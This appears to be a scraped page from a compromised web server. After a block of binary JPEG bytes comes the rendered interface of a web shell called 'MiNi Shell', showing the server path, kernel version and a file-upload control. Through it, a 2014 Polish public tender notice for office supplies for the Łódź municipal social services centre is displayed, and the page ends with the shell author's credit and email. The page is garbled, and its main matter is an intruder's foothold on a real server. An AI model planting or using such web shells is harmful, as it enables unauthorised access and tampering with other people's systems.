JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140709/148391-N-2014.html

<p class="kh_header"><b>Łódź: Zakup i dostawa artykułów biurowych dla potrzeb Miejskiego Ośrodka Pomocy Społecznej w Łodzi.</b><br>
<b>Numer ogłoszenia: 148391 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.uml.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów biurowych dla potrzeb Miejskiego Ośrodka Pomocy Społecznej w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów biurowych dla potrzeb Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz podległych placówek, zgodnie     z asortymentem i ilością wyszczególnioną w załączniku nr 1 (Formularz ofertowy).
Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający ze względu na specyfikę przedmiotu zamówienia podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych, o parametrach nie gorszych niż te podane w opisie przedmiotu zamówienia - podstawa prawna art. 29 ust. 3 ustawy Prawo zamówień publicznych.
Ilości podane w załączniku nr 1 są ilościami szacunkowymi i ilość zamawianych asortymentów może odbiegać od podanych w załączniku. 
Dopuszcza się możliwość przesunięć ilości artykułów biurowych pomiędzy poszczególnymi asortymentami wyszczególnionymi w załączniku nr 1 (Formularz ofertowy) w ramach wartości brutto zamówienia.
Zamawiający zastrzega sobie prawo do niewykorzystania pełnej  wartości przedmiotu zamówienia, bez prawa roszczeń z tego tytułu przez Wykonawcę. 
Miejscem realizacji dostaw artykułów biurowych są następujące placówki:
1) Miejski Ośrodek Pomocy Społecznej w Łodzi ul. Piotrkowska 147/149
2) I Wydział Pracy Środowiskowej w Łodzi przy ul. Tybury 19
3) Punkt Pracy Socjalnej w Łodzi przy ul. Limanowskiego 194/196
4) Punkt Pracy Socjalnej w Łodzi przy ul. Tokarzewskiego 53
5) Punkt Pracy Socjalnej w Łodzi przy ul. Marysińska 36
6) Punkt Pracy Socjalnej w Łodzi przy ul. Motylowa 4
7) Punkt Pracy Socjalnej w Łodzi przy ul. Rybna 18
8) Punkt Pracy Socjalnej w Łodzi przy ul. Perla 2
9) Punkt Pracy Socjalnej w Łodzi przy ul. Sprinterów 11
10) Punkt Pracy Socjalnej w Łodzi przy ul. Kasprzaka 27
11) Punkt Pracy Socjalnej w Łodzi przy ul. Karolewska 70/76
12) Punkt Pracy Socjalnej w Łodzi przy ul. Garnizonowej 38
13) Dom Dziennego Pobytu w Łodzi przy ul. Rojnej 52
14) Dom Dziennego Pobytu w Łodzi przy ul. Wrocławskiej 10
15) Dom Dziennego Pobytu w Łodzi przy ul. Organizacji WIN 37
16) Dom Dziennego Pobytu w Łodzi przy ul. Borowa 6
17) Dom Dziennego Pobytu dla Osób Niepełnosprawnych w Łodzi przy ul. Rojnej 18a
18) Świetlica Środowiskowa w Łodzi przy ul. Tybury 16
19) Klub Integracji Społecznej w Łodzi przy ul. Tybury 16
20) II Wydział Pracy Środowiskowej w Łodzi przy ul. Grota Roweckiego 30
21) Punkt Pracy Socjalnej w Łodzi przy ul. Elsnera 12
22) Punkt Pracy Socjalnej w Łodzi przy ul. Zbocze 2a
23) Punkt Pracy Socjalnej w Łodzi przy ul. Wysokiej 20/22
24) Punkt Pracy Socjalnej w Łodzi przy ul. Tramwajowa 21
25) Punkt Pracy Socjalnej w Łodzi przy ul. 10-go Lutego 7/9
26) Punkt Pracy Socjalnej w Łodzi przy ul. Piotrkowskiej 61
27) Dom Dziennego Pobytu w Łodzi przy Al. Kościuszki 29
28) Dom Dziennego Pobytu w Łodzi przy ul. Narutowicza 37
29) Dom Dziennego Pobytu w Łodzi przy ul. Piotrkowska 203/205
30) Dom Dziennego Pobytu w Łodzi przy ul. Jaracza 36
31) Dom Dziennego Pobytu w Łodzi przy ul. Ćwiklińskiej 18
32) Dom Dziennego Pobytu w Łodzi przy ul. Grota -Roweckiego 30
33) Dom Dziennego Pobytu w Łodzi przy ul. Smetany 4
34) Dom Dziennego Pobytu w Łodzi przy ul. Fabryczna 19
35) Dom Dziennego Pobytu w Łodzi przy ul. Zbocze 2a
36) Świetlica Środowiskowa w Łodzi przy ul. Ćwiklińskiej 5a 
37) Świetlica Środowiskowa w Łodzi przy ul. Smetany 4
38) Dom Dziennego Pobytu dla Osób Niepełnosprawnych w Łodzi przy ul. Ćwiklińskiej 5a
39) Klub Integracji Społecznej w Łodzi przy ul. Księży Młyn 2
40) III Wydział Pracy Środowiskowej w Łodzi przy ul. Będzińskiej 5
41) Punkt Pracy Środowiskowej w Łodzi przy ul. Będzińskiej 5
42) Punkt Pracy Środowiskowej w Łodzi przy ul. Dąbrowskiego 33
43) Punkt Pracy Środowiskowej w Łodzi przy ul. Senatorskiej 4
44) Punkt Pracy Środowiskowej w Łodzi przy ul. Paderewskiego 47
45) Punkt Pracy Środowiskowej w Łodzi przy ul. Rzgowskiej 170
46) Punkt Pracy Środowiskowej w Łodzi przy ul. Wróblewskiego 18
47) Dom Dziennego Pobytu w Łodzi przy ul. Lelewela 17
48) Dom Dziennego Pobytu w Łodzi przy ul. Obywatelskiej 69
49) Dom Dziennego Pobytu w Łodzi przy ul. Senatorskiej 4
50) Dom Dziennego Pobytu w Łodzi przy ul. 1 Maja 24/26
51) Świetlica Środowiskowa w Łodzi przy ul. Senatorskiej 4
52) Schronisko dla Bezdomnych Kobiet w Łodzi przy ul. Gałczyńskiego 7
53) Klub Integracji Społecznej w Łodzi przy ul. Paderewskiego 47
54) Wydział Wspierania Rodzinnej Pieczy Zastępczej w Łodzi przy ul. Lipowej 28
55) Miejski Zespół ds. Orzekania o Niepełnosprawności w Łodzi przy ul. Leczniczej 6
Dostawy odbywać się będą sukcesywnie w terminach uzgodnionych z Zamawiającym, każdorazowo na podstawie zamówienia składanego przez Zamawiającego, faksem lub telefonicznie. 
Zamówienie określać będzie asortyment towaru oraz ilość.
Dostawy odbywać się będą w godzinach 9:00- 15:00
Wykonawca będzie dostarczał artykuły biurowe własnym transportem, na własny koszt wraz z rozładunkiem i wniesieniem do pomieszczeń wskazanych przez Zamawiającego, bez obciążenia z tego tytułu Zamawiającego dodatkowymi kosztami.
Przedmiot zamówienia musi być nowy, posiadać oryginalne fabryczne opakowanie, wolny od wad, dobrej jakości i dopuszczony do obrotu.
Dostarczony przedmiot zamówienia musi być opakowany w sposób umożliwiający jego identyfikację (ilość, rodzaj) bez konieczności naruszenia opakowania oraz z wszelkimi zabezpieczeniami stosowanymi przez producenta.
Wymagania stawiane Wykonawcy:
1) Wykonawca odpowiedzialny będzie za przebieg oraz terminowe wykonanie umowy,
2) Wykonawca odpowiedzialny będzie za jakość dostaw, zgodnie z wymaganiami jakościowymi określonymi dla przedmiotu zamówienia, 
3) wymagana będzie należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalna w działalności objętej przedmiotem zamówienia,
4) Wykonawca będzie wydawał przedmiot zamówienia zgodnie ze zgłoszonym zapotrzebowaniem ilościowym,
5) dostarczone przez Wykonawcę artykuły biurowe będą musiały posiadać wszelkie niezbędne certyfikaty (atesty) właściwych urzędów,
6) na każde żądanie Zamawiającego, Wykonawca zobowiązany będzie okazać w stosunku do każdego produktu odpowiednie certyfikaty zgodności z Polską Normą lub normami europejskimi oraz posiadać ważne terminy przydatności.
Zamawiający nie będzie ponosił odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
Zamawiający zastrzega sobie prawo do odmowy przyjęcia dostawy w przypadku:
1) dostarczenia innego asortymentu niż zamówiony,
2) dostarczenia ilości artykułów niezgodnych z zamówieniem,
3) dostarczenia artykułów w terminach nie uzgodnionych z Zamawiającym. 
Wykonawca każdorazowo będzie wystawiał fakturę po dokonaniu dostawy artykułów biurowych.
Do każdej faktury Wykonawca zobowiązany będzie dołączyć dokument (W-Z) wskazujący miejsce dostawy oraz potwierdzający odbiór towaru przez upoważnionego pracownika Zamawiającego.
Należność za dostarczony przedmiot zamówienia, Wykonawca będzie ustalał po każdorazowym wykonaniu dostawy w oparciu o ceny jednostkowe.
Ceny netto określone przez Wykonawcę w ofercie będą  cenami stałymi i nie będą mogły ulec zmianie przez cały okres realizacji zamówienia.
Zapłata za dostarczone artykuły biurowe nastąpi w drodze przelewu z konta Zamawiającego na konto Wykonawcy.
Zapłata za dostarczone artykuły biurowe płatna będzie w terminie do 30 dni od daty dostarczenia prawidłowo wystawionej faktury Zamawiającemu do jego siedziby tj. Miejskiego Ośrodka Pomocy Społecznej w Łodzi przy ul. Piotrkowskiej 149.
Wykonawca jest zobowiązany do monitorowania wartości zamówienia.
Dostarczone artykuły biurowe będą posiadały co najmniej roczny okres przydatności do użytku licząc od dnia dostawy. 
W przypadku ujawnienia wad jakościowych lub braku artykułów, których nie można było stwierdzić w chwili dostawy, Zamawiający niezwłocznie po ich wykryciu powiadomi Wykonawcę o tym fakcie w formie pisemnej.
Wykonawca zobowiązany jest do wymiany wadliwych artykułów na wolne od wad lub uzupełnienia braków w terminie 3 dni roboczych od ich zgłoszenia.
Wszelkie koszty związane z realizacją reklamacji ponosi Wykonawca.
W przypadku niewykonania lub nienależytego wykonania przedmiotu zamówienia, Wykonawca zobowiązany będzie do zapłacenia Zamawiającemu kar umownych w wysokości  i w sytuacjach określonych Istotnych Postanowieniach Umowy.       
Każdy Wykonawca w prowadzonym postępowaniu może złożyć tylko jedną ofertę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziały w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziały w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziały w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziały w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziały w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadku ustawowej zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uml.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi ul. Piotrkowska 149, 90-44 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi ul. Piotrkowska 149, 90-44 Łódź - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com